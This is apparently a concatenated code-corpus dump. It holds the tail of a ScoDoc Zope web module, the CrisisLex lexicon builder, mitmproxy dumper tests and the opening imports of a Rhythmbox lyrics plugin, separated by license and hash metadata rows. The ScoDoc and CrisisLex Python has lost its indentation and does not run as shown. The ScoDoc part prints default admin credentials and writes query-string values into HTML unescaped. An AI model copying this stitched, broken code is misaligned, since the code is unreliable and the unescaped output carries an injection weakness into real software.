H.append("""<p><a href="/force_admin_authentication">Identifiez vous comme administrateur</a> (au début: nom 'admin', mot de passe 'scodoc')</p>""")
else:
H.append('<ul class="main">')
if isAdmin:
dest_folder = '/Scolarite'
else:
dest_folder = ''
for deptFolder in self.list_depts():
H.append('<li><a class="stdlink" href="%s%s">Scolarité département %s</a>'
% (deptFolder.absolute_url(), dest_folder, deptFolder.id))
                # check if roles are initialized in this dept, and do it if necessary
if deptFolder.Scolarite.roles_initialized == '0':
if isAdmin:
deptFolder.Scolarite._setup_initial_roles_and_permissions()
else:
H.append(' (non initialisé, connectez vous comme admin)')
H.append('</li>')
H.append('</ul>')
if isAdmin:
H.append('<p><a href="scodoc_admin">Administration de ScoDoc</a></p>')
else:
H.append('<p><a href="%s/force_admin_authentication">Se connecter comme administrateur</a></p>' % REQUEST.BASE0)
try:
img = self.icons.firefox_fr.tag(border='0')
except:
img = '' # icons folder not yet available
H.append("""
<div id="scodoc_attribution">
<p><a href="%s">ScoDoc</a> est un logiciel libre de suivi de la scolarité des étudiants conçu par
E. Viennet (Université Paris 13).</p>
<p>Ce logiciel est conçu pour un navigateur récent et <em>ne s'affichera pas correctement avec un logiciel
ancien</em>. Utilisez par exemple Firefox (libre et gratuit).</p>
<a href="http://www.mozilla-europe.org/fr/products/firefox/">%s</a>
</div>
</div>""" % (SCO_WEBSITE,img) )
H.append("""</body></html>""")
return '\n'.join(H)
security.declareProtected('View', 'index_dept')
def index_dept(self, deptfoldername='', REQUEST=None):
"""Page d'accueil departement"""
authuser = REQUEST.AUTHENTICATED_USER
try:
dept = getattr(self, deptfoldername)
if authuser.has_permission(ScoView,dept):
return REQUEST.RESPONSE.redirect('ScoDoc/%s/Scolarite'%deptfoldername)
except:
log('*** problem in index_dept (%s) user=%s' % (deptfoldername,str(authuser)))
H = [ self.standard_html_header(self),
"""<div style="margin: 1em;">
<h2>Scolarité du département %s</h2>
<p>
Ce site est
<font color="#FF0000"><b>réservé au personnel du département</b></font>.
</p>
<!-- login -->
<form action="doLogin" method="post">
<input type="hidden" name="destination" value="Scolarite"/>
<p>
<table border="0" cellpadding="3">
<tr>
<td><b>Nom:</b></td>
<td><input id="name" type="text" name="__ac_name" size="20"/></td>
</tr><tr>
<td><b>Mot de passe:</b></td>
<td><input id="password" type="password" name="__ac_password" size="20"/></td>
<td><input id="submit" name="submit" type="submit" value="OK"/></td>
</tr>
</table>
</p>
</form>
<p>Pour quitter, <a href="acl_users/logout">logout</a>
</p>
<p>Ce site est conçu pour un navigateur récent et <em>ne s'affichera pas correctement avec un logiciel
ancien</em>. Utilisez par exemple Firefox (gratuit et respectueux des normes).</p>
<a href="http://www.mozilla-europe.org/fr/products/firefox/">%s</a>
</div>
""" % (deptfoldername, self.icons.firefox_fr.tag(border='0')),
self.standard_html_footer(self)]
return '\n'.join(H)
security.declareProtected('View', 'doLogin')
def doLogin(self, REQUEST=None, destination=None):
"redirect to destination after login"
if destination:
return REQUEST.RESPONSE.redirect( destination )
security.declareProtected('View', 'docLogin')
docLogin = DTMLFile('dtml/docLogin', globals())
security.declareProtected('View', 'docLogout')
docLogout = DTMLFile('dtml/docLogout', globals())
security.declareProtected('View', 'query_string_to_form_inputs')
def query_string_to_form_inputs(self, query_string=''):
"""Return html snippet representing the query string as POST form hidden inputs.
This is useful in conjonction with exUserfolder to correctly redirect the response
after authentication.
"""
H = []
for a in query_string.split('&'):
if a:
nv = a.split('=')
if len(nv) == 2:
name, value = nv
H.append( '<input type="hidden" name="' + name
+'" value="' + value + '"/>' )
return '<!-- query string -->\n' + '\n'.join(H)
security.declareProtected('View', 'standard_html_header')
def standard_html_header(self, REQUEST=None):
"""Standard HTML header for pages outside depts"""
# not used in ZScolar, see sco_header
return """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<title>ScoDoc: accueil</title>
<META http-equiv="Content-Type" content="text/html; charset=%s">
<META http-equiv="Content-Style-Type" content="text/css">
<META name="LANG" content="fr">
<META name="DESCRIPTION" content="ScoDoc: gestion scolarite">
<link HREF="/ScoDoc/static/css/scodoc.css" rel="stylesheet" type="text/css"/>
</head><body>%s""" % (SCO_ENCODING, CUSTOM_HTML_HEADER_CNX)
security.declareProtected('View', 'standard_html_footer')
def standard_html_footer(self, REQUEST=None):
return """<p class="footer">
Problème de connexion (identifiant, mot de passe): <em>contacter votre responsable ou chef de département</em>.<br/>
Problèmes et suggestions sur le logiciel: <a href="mailto:emmanuel.viennet@univ-paris13.fr">emmanuel.viennet@univ-paris13.fr</a>
ou <a href="mailto:%s">%s</a>
</p>
</body></html>""" % (SCO_USERS_LIST, SCO_USERS_LIST)
# sendEmail is not used through the web
def sendEmail(self,msg):
# sends an email to the address using the mailhost, if there is one
try:
mail_host = self.MailHost
except:
log('warning: sendEmail: no MailHost found !')
return
# a failed notification shouldn't cause a Zope error on a site.
try:
mail_host.send(msg.as_string())
log('sendEmail: ok')
except:
log('sendEmail: exception while sending message')
pass
def sendEmailFromException(self,msg):
# Send email by hand, as it seems to be not possible to use Zope Mail Host
# from an exception handler (see https://bugs.launchpad.net/zope2/+bug/246748)
log('sendEmailFromException')
try:
p = os.popen("sendmail -t", 'w') # old brute force method
p.write(msg.as_string())
exitcode = p.close()
if exitcode:
log('sendmail exit code: %s' % exitcode)
except:
log('an exception occurred sending mail')
security.declareProtected('View', 'standard_error_message')
def standard_error_message(self, error_value=None, error_message=None, error_type=None,
error_traceback=None, error_tb=None, **kv):
"Recuperation des exceptions Zope"
sco_dev_mail = SCO_DEV_MAIL
# neat (or should I say dirty ?) hack to get REQUEST
# in fact, our caller (probably SimpleItem.py) has the REQUEST variable
# that we'd like to use for our logs, but does not pass it as an argument.
try:
frame = inspect.currentframe()
REQUEST = frame.f_back.f_locals['REQUEST']
except:
REQUEST = {}
# Authentication uses exceptions, pass them up
HTTP_X_FORWARDED_FOR = REQUEST.get('HTTP_X_FORWARDED_FOR', '')
if error_type == 'LoginRequired':
            # raise 'LoginRequired', '' # copied from exuserFolder (yuck, old style exception...)
log('LoginRequired from %s' % HTTP_X_FORWARDED_FOR)
self.login_page = error_value
return error_value
elif error_type == 'Unauthorized':
log('Unauthorized from %s' % HTTP_X_FORWARDED_FOR)
return self.acl_users.docLogin(self, REQUEST=REQUEST)
log('exception caught: %s' % error_type)
if error_type == 'ScoGenError':
return '<p>' + str(error_value) + '</p>'
elif error_type == 'ScoValueError':
# Not a bug, presents a gentle message to the user:
H = [ self.standard_html_header(self),
"""<h2>Erreur !</h2><p>%s</p>""" % error_value ]
if error_value.dest_url:
H.append('<p><a href="%s">Continuer</a></p>' % error_value.dest_url )
H.append(self.standard_html_footer(self))
return '\n'.join(H)
else: # Other exceptions, try carefully to build an error page...
#log('exc A')
H = []
try:
H.append( self.standard_html_header(self) )
except:
pass
if error_message:
H.append( str(error_message) )
else:
H.append("""<table border="0" width="100%%"><tr valign="top">
<td width="10%%" align="center"></td>
<td width="90%%"><h2>Erreur !</h2>
<p>Une erreur est survenue</p>
<p>
<strong>Error Type: %(error_type)s</strong><br>
<strong>Error Value: %(error_value)s</strong><br>
</p>
<hr noshade>
<p>L'URL est peut-etre incorrecte ?</p>
<p>Si l'erreur persiste, contactez Emmanuel Viennet:
<a href="mailto:%(sco_dev_mail)s">%(sco_dev_mail)s</a>
en copiant ce message d'erreur et le contenu du cadre bleu ci-dessous si possible.
</p>
</td></tr>
</table> """ % vars() )
# display error traceback (? may open a security risk via xss attack ?)
#log('exc B')
txt_html = self._report_request(REQUEST, format='html')
H.append("""<h4>Zope Traceback (à envoyer par mail à <a href="mailto:%(sco_dev_mail)s">%(sco_dev_mail)s</a>)</h4><div style="background-color: rgb(153,153,204); border: 1px;">
%(error_tb)s
<p><b>Informations:</b><br/>
%(txt_html)s
</p>
</div>
<p>Merci de votre patience !</p>
""" % vars() )
try:
H.append( self.standard_html_footer(self) )
except:
log('no footer found for error page')
pass
# --- Mail:
error_traceback_txt = scodoc_html2txt(error_tb)
txt = """
ErrorType: %(error_type)s
%(error_traceback_txt)s
""" % vars()
self.send_debug_alert(txt, REQUEST=REQUEST)
# ---
log('done processing exception')
# log( '\n page=\n' + '\n'.join(H) )
return '\n'.join(H)
def _report_request(self, REQUEST, format='txt'):
"""string describing current request for bug reports"""
AUTHENTICATED_USER = REQUEST.get('AUTHENTICATED_USER', '')
dt = time.asctime()
URL = REQUEST.get('URL', '')
QUERY_STRING = REQUEST.get('QUERY_STRING', '')
if QUERY_STRING:
QUERY_STRING = '?' + QUERY_STRING
REFERER = 'na' # REQUEST.get('HTTP_REFERER', '')
form = REQUEST.get('form', '')
HTTP_X_FORWARDED_FOR = REQUEST.get('HTTP_X_FORWARDED_FOR', '')
HTTP_USER_AGENT = 'na' # REQUEST.get('HTTP_USER_AGENT', '')
svn_version = get_svn_version(self.file_path)
txt = """
User: %(AUTHENTICATED_USER)s
Date: %(dt)s
URL: %(URL)s%(QUERY_STRING)s
REFERER: %(REFERER)s
Form: %(form)s
Origin: %(HTTP_X_FORWARDED_FOR)s
Agent: %(HTTP_USER_AGENT)s
subversion: %(svn_version)s
""" % vars()
if format == 'html':
txt = txt.replace('\n', '<br/>')
return txt
security.declareProtected(ScoSuperAdmin, 'send_debug_alert')# not called through the web
def send_debug_alert(self, txt, REQUEST=None):
"""Send an alert email (bug report) to ScoDoc developpers"""
if not SCO_DEV_MAIL:
log('send_debug_alert: email disabled')
return
if REQUEST:
txt = self._report_request(REQUEST) + txt
URL = REQUEST.get('URL', '')
else:
URL = 'send_debug_alert'
msg = MIMEMultipart()
subj = Header( '[scodoc] exc %s' % URL, SCO_ENCODING )
msg['Subject'] = subj
recipients = [ SCO_DEV_MAIL ]
        msg['To'] = ', '.join(recipients)
msg['From'] = 'scodoc-alert'
msg.epilogue = ''
msg.attach(MIMEText( txt, 'plain', SCO_ENCODING ))
self.sendEmailFromException(msg)
log('Sent mail alert:\n' + txt)
security.declareProtected('View', 'scodoc_admin')
def scodoc_admin(self, REQUEST=None):
"""Page Operations d'administration
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
H = [ self._html_begin %
{ 'page_title' : 'ScoDoc: bienvenue',
'encoding' : SCO_ENCODING },
self._top_level_css,
"""</head>
<body>
<h3>Administration ScoDoc</h3>
<p><a href="change_admin_user_form">changer le mot de passe super-administrateur</a></p>
<p><a href="%s">retour à la page d'accueil</a></p>
<h4>Création d'un département</h4>
<p class="help">Le département doit avoir été créé au préalable sur le serveur en utilisant le script
<tt>create_dept.sh</tt> (à lancer comme <tt>root</tt> dans le répertoire <tt>config</tt> de ScoDoc).
</p>""" % self.absolute_url()]
        deptList = [ x.id for x in self.list_depts() ] # defined in Zope
        deptIds = Set(self._list_depts_ids()) # defined on the filesystem
existingDepts = Set(deptList)
addableDepts = deptIds - existingDepts
if not addableDepts:
            # no department defined: help the user
H.append("<p>Aucun département à ajouter !</p>")
else:
H.append("""<form action="create_dept"><select name="DeptId"/>""")
for deptId in addableDepts:
H.append("""<option value="%s">%s</option>""" % (deptId,deptId))
H.append("""</select>
<input type="submit" value="Créer département">
</form>""" )
if deptList:
H.append("""
<h4>Suppression d'un département</h4>
<p>Ceci permet de supprimer le site web associé à un département, mais n'affecte pas la base de données
(le site peut donc être recréé sans perte de données).
</p>
<form action="delete_dept">
<select name="DeptId">
""")
for deptFolder in self.list_depts():
H.append('<option value="%s">%s</option>'
% (deptFolder.id, deptFolder.id) )
H.append("""</select>
<input type="submit" value="Supprimer département">
</form>""")
        # Other operations
H.append("""<h4>Autres opérations</h4>
<ul>
<li><a href="build_icons_folder">Reconstruire les icônes</a></li>
</ul>
""")
H.append("""</body></html>""")
return '\n'.join(H)
def _list_depts_ids(self):
"""Liste de id de departements definis par create_dept.sh
(fichiers depts/*.cfg)
"""
filenames = glob.glob( self.file_path + '/config/depts/*.cfg')
ids = [ os.path.split(os.path.splitext(f)[0])[1] for f in filenames ]
return ids
def _check_icons_folder(self,REQUEST=None): # not published
"""Vérifie icons folder Zope et le crée s'il le faut
XXX deprecated: on utilisera maintenant les images statiques via sco_utils.icontag()
"""
try:
icons = self.icons
plus = self.icons.plus_img # upgrade jul 2008
arrow_up = self.icons.arrow_up # nov 2009
return '<!-- icons ok -->'
except:
e = self._check_admin_perm(REQUEST)
if not e: # admin permissions:
self.build_icons_folder(REQUEST)
return '<div class="head_message">Création du dossier icons réussie</div>'
else:
return """<div class="head_message">Installation non terminée: connectez vous avec les droits d'administrateur</div>"""
security.declareProtected('View', 'build_icons_folder')
def build_icons_folder(self,REQUEST=None):
"""Build folder with Zope images
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
return self.do_build_icons_folder(REQUEST=REQUEST)
security.declareProtected('View', 'do_build_icons_folder')
def do_build_icons_folder(self,REQUEST=None): # not published
# Build folder with Zope images
id = 'icons'
try:
o = self[id]
exists = True
except:
exists = False
# If folder exists, destroy it !
if exists:
log('build_image_folder: destroying existing folder !')
self.manage_delObjects(ids=[ id ])
# Create Zope folder
log('build_image_folder: building new %s folder' % id )
self.manage_addProduct['OFSP'].manage_addFolder(id, title='ScoDoc icons')
folder = self[id]
# Create Zope images instances for each file in .../static/icons/*
path = self.file_path + '/static/icons/'
add_method = folder.manage_addProduct['OFSP'].manage_addImage
for filename in os.listdir(path):
if filename != '.svn':
iid = os.path.splitext(filename)[0]
log('adding image %s as %s' % (filename,iid))
add_method( iid, open(path+'/'+filename) )
return 'ok'
security.declareProtected('View', 'http_expiration_date')
def http_expiration_date(self):
"http expiration date for cachable elements (css, ...)"
d = datetime.timedelta(minutes=10)
return (datetime.datetime.utcnow() + d).strftime("%a, %d %b %Y %H:%M:%S GMT")
security.declareProtected('View', 'get_etud_dept')
def get_etud_dept(self, REQUEST=None):
"""Returns the dept id (eg "GEII") of an etud (identified by etudid, INE or NIP in REQUEST).
Warning: This function is inefficient and its result should be cached.
"""
depts = self.list_depts()
for dept in depts:
etud = dept.Scolarite.getEtudInfo(REQUEST=REQUEST)
if etud:
return dept.id
return '' # not found
def manage_addZScoDoc(self, id= 'ScoDoc',
title='Site ScoDoc',
REQUEST=None):
"Add a ZScoDoc instance to a folder."
log('============== creating a new ScoDoc instance =============')
    zscodoc = ZScoDoc(id, title) # creates (almost) nothing; everything happens on first access
self._setObject(id,zscodoc)
if REQUEST is not None:
REQUEST.RESPONSE.redirect('%s/manage_workspace' % REQUEST.URL1)
return id
|
gpl-2.0
| -8,725,492,649,563,317,000 | 37.161081 | 191 | 0.58962 | false |
sajao/CrisisLex
|
src-create/build.py
|
1
|
9212
|
# CrisisLex
# Author: Alexandra Olteanu
# Check LICENSE for details about copyright.
#TO-DO: further testing and code cleaning will be done
import nltk
import math
import os
import glob
import networkx as nx
from optparse import OptionParser
from nltk.stem.porter import PorterStemmer
import read
import config
import lexicon
# estimates the maximum weighted independent set formed by terms in the co-occurrence graph
def extract_max_weight_indep_terms_greedy(terms_weights, term_occ, freq, size, min_occ = 0.7):
#build the occ_graph
G = nx.Graph()
l = len(terms_weights)
term_weights = dict(terms_weights)
# add nodes
for t in term_weights:
G.add_node(t, score = term_weights[t])
# add edges
terms = term_weights.keys()
for i,t in enumerate(terms):
if i == l-1:
break
for j in range(i+1,l):
occ = float(term_occ.get((t,terms[j]),0)+term_occ.get((terms[j],t),0))
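            # edge weight = Jaccard overlap: co-occurrences / occurrences of either term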
try:
edge_weight = occ/(freq[t]+freq[terms[j]]-occ)
except:
edge_weight = 0
if edge_weight >= min_occ:
G.add_edge(t,terms[j])
indep = list()
sorted_terms = sorted(term_weights, key=term_weights.get, reverse=True)
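    # greedy approximation of the max-weight independent set: repeatedly take the
    # highest-scored remaining term and drop all of its neighbours in the graph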
while True:
if len(sorted_terms)==0:
break
node = sorted_terms[0]
indep.append(node)
ng = G.neighbors(node)
sorted_terms.remove(node)
for n in ng:
sorted_terms.remove(n)
G.remove_node(n)
G.remove_node(node)
return set(indep[:size])
def get_aggregated_score(args):
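    # mean of the per-collection scores, damped by a logistic factor of the number of
    # collections the term appears in (terms seen in more collections keep more of their mean)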
return (float(sum(args))/len(args)) * (1. / (1 + math.exp(-( float(len(args)) / 2 ))))
# hit_ratio gives each term's hit ratio across datasets
def discriminative_coverage(term_weights, hit_ratio = None):
weights = dict()
i = len(term_weights)
l = i
sorted_terms = sorted(term_weights, key=term_weights.get, reverse=True)
# discriminative sorting of quantiles
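    # the top-ranked term gets weight 1.0, the lowest-ranked gets 1/l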
for t in sorted_terms:
weights[t] = float(i)/l
i-=1
if hit_ratio is None:
return weights
i=l
sorted_terms = sorted(hit_ratio, key=hit_ratio.get, reverse=True)
#normalized by hit-ratio based quantiles
for t in sorted_terms:
if t in term_weights:
weights[t] *= float(i)/l
i-=1
return weights
#generates the lexicon
def get_raw_lexicon(collections, tweets_terms, word_set, tweets_cls, word_occ, fd, mean_function, discriminative_function, use_hit_ratio = False):
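    # score terms within each labeled collection, then aggregate the scores across collections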
occs, fd_all = dict(), nltk.FreqDist()
term_weights = dict()
if use_hit_ratio:
hit_ratios = dict()
for d in collections:
lex = lexicon.Lexicon(tweets_terms[d], word_set[d], tweets_cls[d], [config.positive_class_label, config.negative_class_label], fd[d], config.positive_class_label, 20)
w = discriminative_function(lex)
for occ in word_occ[d]:
occs[occ] = occs.get(occ,0)+word_occ[d][occ]
for fr in fd[d]:
fd_all[fr] = fd_all.get(fr,0)+fd[d][fr]
for term in w:
if term not in term_weights:
term_weights[term] = []
term_weights[term].append(w[term])
if use_hit_ratio:
if term not in hit_ratios:
hit_ratios[term] = []
hit_ratios[term].append(float(lex.terms_frequency_per_class[lex.main_class][term])/lex.class_occ[lex.main_class])
for term in term_weights:
term_weights[term] = mean_function(term_weights[term])
if use_hit_ratio:
for term in term_weights:
hit_ratios[term] = mean_function(hit_ratios[term])
term_weights = discriminative_coverage(term_weights, hit_ratios)
else:
term_weights = discriminative_coverage(term_weights)
return term_weights, occs, fd_all
# reverses stemmed bigrams to their most frequent surface form as a whole, instead of reversing each word separately
def reverse_stemmed_terms_set(stemmed_terms, reverse_stemming, reverse_bigrams_stemming):
terms = []
for w in stemmed_terms:
ws = w.split()
if len(ws)==2:
if (ws[0],ws[1]) in reverse_bigrams_stemming:
rev = reverse_bigrams_stemming[(ws[0],ws[1])]
terms.append(rev[0]+' '+rev[1])
else:
exit("I can't reverse the bi-gram: The \"%s\" bi-gram was not stemmed"%w)
else:
if w in reverse_stemming:
rev = reverse_stemming[w]
terms.append(rev)
else:
exit("I can't reverse the uni-gram: The \"%s\" uni-gram was not stemmed"%w)
return terms
# builds a map that reverses all the stemmed words to their most frequent form
def reverse_stemming(stem_map):
rev_stemming = dict()
for s in stem_map:
max = 0
aux = None
for w in stem_map[s]:
if max < stem_map[s][w]:
max = stem_map[s][w]
aux = w
if aux is None:
print "Generate map: The word was not stemmed", s
print stem_map
exit(0)
rev_stemming[s] = aux
return rev_stemming
def reverse_stemming_bigrams(stem_bigrams_map):
return reverse_stemming(stem_bigrams_map)
# writes the lexicon to file
def save_lexicon(output, scored_terms, term_freq, stem, score):
ps = PorterStemmer()
f1 = open(output, "w")
f2 = open(output[0:len(output)-len(output.split(".")[len(output.split("."))-1])-1]+"_with_scores_%s.txt"%score,"w")
print "Saving the lexicon to file..."
for i,t in enumerate(scored_terms):
print>>f1,t[0]
print>>f2,"%s,%s,%s"%(t[0],t[1],term_freq[stem[i]])
print "The Lexicon is ready!"
if __name__ == "__main__":
#command line options
parser = OptionParser()
parser.add_option("-s", "--terms_scoring", dest="test",
help="The statistical test used to score terms: pmi, chi2 or frequency (in the relevant documents)",
default = "pmi")
parser.add_option("-r", "--hit_ratio", dest="hit_ratio",
help="It normalizes the crisis score according to the number of relevant tweets the term matches on.",
action="store_true", default = False)
parser.add_option("-t","--top_div", dest="optimization",
help="It filters out the terms with lower crisis scores that frequently co-occur with with terms with higher scores",
action="store_true", default = False)
parser.add_option("-o", "--output", dest="output",
help="Write output to FILE. The script will write one term per line",
metavar="FILE", default = "your_lexicon.csv")
parser.add_option("-i", "--input", dest="input",
help="Read from FILE_PATH. The FILE_PATH is expected to point to a director containing one sub-director per collection. "
"It assumes that each collection file contains a header and on each line has: tweet id, tweet text, tweet class (which needs to be among the ones you set in the config.py file)",
metavar="FILE", default = "")
(options, args) = parser.parse_args()
tweets_cls = dict()
tweets_terms = dict()
wd_occ = dict()
word_set = dict()
fd = dict()
stem_map, bigrams_map = dict(), dict()
collections = set()
#set discriminative functions
scoring_options = {'pmi':lexicon.Lexicon.pmi_polarity_metric,'chi2':lexicon.Lexicon.chi2_metric,'frequency':lexicon.Lexicon.frequency_metric}
try:
discriminative_function = scoring_options[options.test]
except:
exit("The terms scoring parameter accepts only the following options: pmi, chi2, frequency")
#extracts terms and computes statistics about them
print "Extracting the data..."
labeled_collections = glob.glob(options.input+"/*")
for l in labeled_collections:
if not os.path.isdir(l):
continue
collection_path = glob.glob(l+"/*")
print collection_path
for c in collection_path:
print c
labeled_data = open(c, "r")
collections.add(c)
tweets_cls[c], tweets_terms[c], wd_occ[c], word_set[c], fd[c] = read.get_terms(labeled_data, stem_map, bigrams_map)
print "Done with reading..."
term_weights, occs, fd_all = get_raw_lexicon(collections, tweets_terms, word_set, tweets_cls, wd_occ, fd, get_aggregated_score, discriminative_function, options.hit_ratio)
if options.optimization:
optimized_terms = extract_max_weight_indep_terms_greedy(term_weights,occs,fd_all,config.lexicon_size)
else:
optimized_terms = set()
top_stemmed = [t for t in sorted(term_weights, key=term_weights.get, reverse=True) if ((not options.optimization) or (options.optimization and t in optimized_terms))][:config.lexicon_size]
top = reverse_stemmed_terms_set(top_stemmed, reverse_stemming(stem_map), reverse_stemming_bigrams(bigrams_map))
sorted_terms_weights = [(top[i],term_weights[t]) for (i,t) in enumerate(top_stemmed)]
save_lexicon(options.output, sorted_terms_weights, fd_all, top_stemmed, options.test)
|
mit
| -338,848,510,721,207,400 | 38.371795 | 201 | 0.615176 | false |
Kriechi/mitmproxy
|
test/mitmproxy/addons/test_dumper.py
|
1
|
8019
|
import io
import shutil
from unittest import mock
import pytest
from mitmproxy import exceptions
from mitmproxy.addons import dumper
from mitmproxy.http import Headers
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy.test import tutils
def test_configure():
d = dumper.Dumper()
with taddons.context(d) as ctx:
ctx.configure(d, dumper_filter="~b foo")
assert d.filter
f = tflow.tflow(resp=True)
assert not d.match(f)
f.response.content = b"foo"
assert d.match(f)
ctx.configure(d, dumper_filter=None)
assert not d.filter
with pytest.raises(exceptions.OptionsError):
ctx.configure(d, dumper_filter="~~")
assert not d.filter
def test_simple():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=0)
d.response(tflow.tflow(resp=True))
assert not sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=1)
d.response(tflow.tflow(resp=True))
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=1)
d.error(tflow.tflow(err=True))
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
d.response(tflow.tflow(resp=True))
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
d.response(tflow.tflow(resp=True))
assert "<<" in sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
d.response(tflow.tflow(err=True))
assert "<<" in sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
flow = tflow.tflow()
flow.request = tutils.treq()
flow.client_conn = mock.MagicMock()
flow.client_conn.peername[0] = "foo"
flow.response = tutils.tresp(content=None)
flow.is_replay = "response"
flow.response.status_code = 300
d.response(flow)
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
flow = tflow.tflow(resp=tutils.tresp(content=b"{"))
flow.response.headers["content-type"] = "application/json"
flow.response.status_code = 400
d.response(flow)
assert sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
ctx.configure(d, flow_detail=4)
flow = tflow.tflow()
flow.request.content = None
flow.response = tutils.tresp(content=None)
d.response(flow)
assert "content missing" in sio.getvalue()
sio.truncate(0)
assert not sio_err.getvalue()
sio_err.truncate(0)
def test_echo_body():
f = tflow.tflow(client_conn=True, server_conn=True, resp=True)
f.response.headers["content-type"] = "text/html"
f.response.content = b"foo bar voing\n" * 100
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3)
d._echo_message(f.response, f)
t = sio.getvalue()
assert "cut off" in t
def test_echo_trailer():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3)
f = tflow.tflow(client_conn=True, server_conn=True, resp=True)
f.request.headers["content-type"] = "text/html"
f.request.headers["transfer-encoding"] = "chunked"
f.request.headers["trailer"] = "my-little-request-trailer"
f.request.content = b"some request content\n" * 100
f.request.trailers = Headers([(b"my-little-request-trailer", b"foobar-request-trailer")])
f.response.headers["transfer-encoding"] = "chunked"
f.response.headers["trailer"] = "my-little-response-trailer"
f.response.content = b"some response content\n" * 100
f.response.trailers = Headers([(b"my-little-response-trailer", b"foobar-response-trailer")])
d.echo_flow(f)
t = sio.getvalue()
assert "content-type" in t
assert "cut off" in t
assert "some request content" in t
assert "foobar-request-trailer" in t
assert "some response content" in t
assert "foobar-response-trailer" in t
def test_echo_request_line():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3, showhost=True)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
f.is_replay = "request"
d._echo_request_line(f)
assert "[replay]" in sio.getvalue()
sio.truncate(0)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
f.is_replay = None
d._echo_request_line(f)
assert "[replay]" not in sio.getvalue()
sio.truncate(0)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
f.request.http_version = "nonstandard"
d._echo_request_line(f)
assert "nonstandard" in sio.getvalue()
sio.truncate(0)
ctx.configure(d, flow_detail=0, showhost=True)
f = tflow.tflow(client_conn=None, server_conn=True, resp=True)
terminalWidth = max(shutil.get_terminal_size()[0] - 25, 50)
f.request.url = "http://address:22/" + ("x" * terminalWidth) + "textToBeTruncated"
d._echo_request_line(f)
assert "textToBeTruncated" not in sio.getvalue()
sio.truncate(0)
class TestContentView:
@pytest.mark.asyncio
async def test_contentview(self):
with mock.patch("mitmproxy.contentviews.auto.ViewAuto.__call__") as va:
va.side_effect = ValueError("")
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as tctx:
tctx.configure(d, flow_detail=4)
d.response(tflow.tflow())
await tctx.master.await_log("content viewer failed")
def test_tcp():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3, showhost=True)
f = tflow.ttcpflow()
d.tcp_message(f)
assert "it's me" in sio.getvalue()
sio.truncate(0)
f = tflow.ttcpflow(client_conn=True, err=True)
d.tcp_error(f)
assert "Error in TCP" in sio_err.getvalue()
def test_websocket():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d) as ctx:
ctx.configure(d, flow_detail=3, showhost=True)
f = tflow.twebsocketflow()
d.websocket_message(f)
assert "it's me" in sio.getvalue()
sio.truncate(0)
d.websocket_end(f)
assert "WebSocket connection closed by" in sio.getvalue()
f = tflow.twebsocketflow(client_conn=True, err=True)
d.websocket_error(f)
assert "Error in WebSocket" in sio_err.getvalue()
def test_http2():
sio = io.StringIO()
sio_err = io.StringIO()
d = dumper.Dumper(sio, sio_err)
with taddons.context(d):
f = tflow.tflow(resp=True)
f.response.http_version = b"HTTP/2.0"
d.response(f)
assert "HTTP/2.0 200 OK" in sio.getvalue()
|
mit
| 5,039,793,679,587,431,000 | 31.204819 | 100 | 0.605188 | false |
ruud-v-a/rhythmbox
|
plugins/lyrics/lyrics.py
|
2
|
13937
|
# -*- Mode: python; coding: utf-8; tab-width: 8; indent-tabs-mode: t; -*-
#
# Copyright (C) 2006 Jonathan Matthew
# Copyright (C) 2007 James Livingston
# Copyright (C) 2007 Sirio Bolaños Puchet
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# The Rhythmbox authors hereby grant permission for non-GPL compatible
# GStreamer plugins to be used and distributed together with GStreamer
# and Rhythmbox. This permission is above and beyond the permissions granted
# by the GPL license by which Rhythmbox is covered. If you modify this code
# you may extend this exception to your version of the code, but you are not
# obligated to do so. If you do not wish to do so, delete this exception
# statement from your version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
import os, re
import urllib.request
import rb
from gi.repository import Gtk, Gio, GObject, Peas
from gi.repository import RB
from gi.repository import Gst, GstPbutils
